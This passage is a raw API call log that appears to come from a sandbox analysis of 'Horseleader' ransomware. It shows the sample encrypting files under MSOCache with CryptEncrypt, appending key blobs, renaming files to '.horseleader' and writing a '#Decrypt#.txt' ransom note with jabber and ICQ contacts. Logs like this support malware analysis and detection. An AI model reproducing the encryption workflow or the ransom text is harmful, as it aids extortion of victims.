
(lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", lpSrch=".testttjffg") returned 0x0 [0215.269] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0215.269] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0215.269] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0215.270] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0215.270] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".txt") returned 0x0 [0215.270] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=868864) returned 1 [0215.270] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.270] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.272] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.273] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.273] SetFilePointerEx (in: 
hFile=0x21c, liDistanceToMove=0x67900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.273] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.279] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.279] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.280] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xcf200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.280] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.282] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.282] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.283] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0215.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0215.283] CloseHandle (hObject=0x21c) returned 1 [0215.283] GetProcessHeap () returned 0x780000 [0215.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0215.284] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.horseleader") returned 95 [0215.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.horseleader")) returned 1 [0215.285] GetProcessHeap () returned 0x780000 [0215.285] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0215.285] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0215.285] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Windows") returned -1 [0215.285] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0215.285] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".horseleader") returned 0x0 [0215.285] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="#Decrypt#.txt") returned 1 [0215.285] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="_uninstalling_.png") returned 1 [0215.285] lstrlenW (lpString=".testttjffg") returned 11 [0215.285] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpSrch=".testttjffg") returned 0x0 [0215.285] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0215.285] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0215.285] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0215.286] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0215.286] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".txt") returned 0x0 [0215.286] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=819) returned 1 [0215.286] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0215.288] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.289] 
WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0215.289] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.289] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0215.289] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0215.289] CloseHandle (hObject=0x21c) returned 1 [0215.289] GetProcessHeap () returned 0x780000 [0215.289] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0215.290] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.horseleader") returned 95 [0215.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.horseleader")) returned 1 [0216.007] GetProcessHeap () returned 0x780000 [0216.007] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0216.007] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0216.007] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0216.007] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0216.007] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0216.007] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0216.007] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0216.007] lstrlenW (lpString=".testttjffg") returned 11 [0216.007] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0216.008] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0216.008] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0216.008] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0216.008] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0216.009] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") 
returned 0x0 [0216.011] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2624) returned 1 [0216.011] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0xa40, lpOverlapped=0x0) returned 1 [0217.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff5c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0217.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0xa40, lpOverlapped=0x0) returned 1 [0217.156] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0217.166] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0217.169] CloseHandle (hObject=0x21c) returned 1 [0217.187] GetProcessHeap () returned 0x780000 [0217.187] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0217.187] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0217.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), 
lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0217.227] GetProcessHeap () returned 0x780000 [0217.227] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0217.227] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0217.228] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0217.228] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0217.228] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0217.234] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0217.234] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0217.236] lstrlenA (lpString="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") returned 1368 [0217.236] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0217.236] CloseHandle (hObject=0x1cc) returned 1 [0217.237] GetProcessHeap () returned 0x780000 [0217.237] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0217.237] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0217.237] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0217.246] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned 66 [0217.247] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0217.247] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0217.247] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0217.247] GetProcessHeap () returned 0x780000 [0217.247] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0217.247] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*") returned 68 [0217.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0217.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0217.372] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.") returned 68 [0217.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0217.372] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0217.372] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0217.372] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0217.372] lstrlenW (lpString=".testttjffg") returned 11 [0217.373] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0217.373] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0217.373] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0217.373] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0217.373] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0217.374] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0217.374] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..") returned 69 [0217.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0217.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0217.374] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0217.374] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0217.374] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0217.374] lstrlenW (lpString=".testttjffg") returned 11 [0217.374] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0217.374] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0217.374] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0217.374] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0217.374] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0217.374] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0217.374] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0217.375] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".horseleader") returned 0x0 [0217.375] lstrcmpW (lpString1="Office32WW.msi", lpString2="#Decrypt#.txt") returned 1 [0217.375] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0217.375] lstrlenW (lpString=".testttjffg") returned 11 [0217.375] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpSrch=".testttjffg") returned 0x0 [0217.375] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0217.375] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 
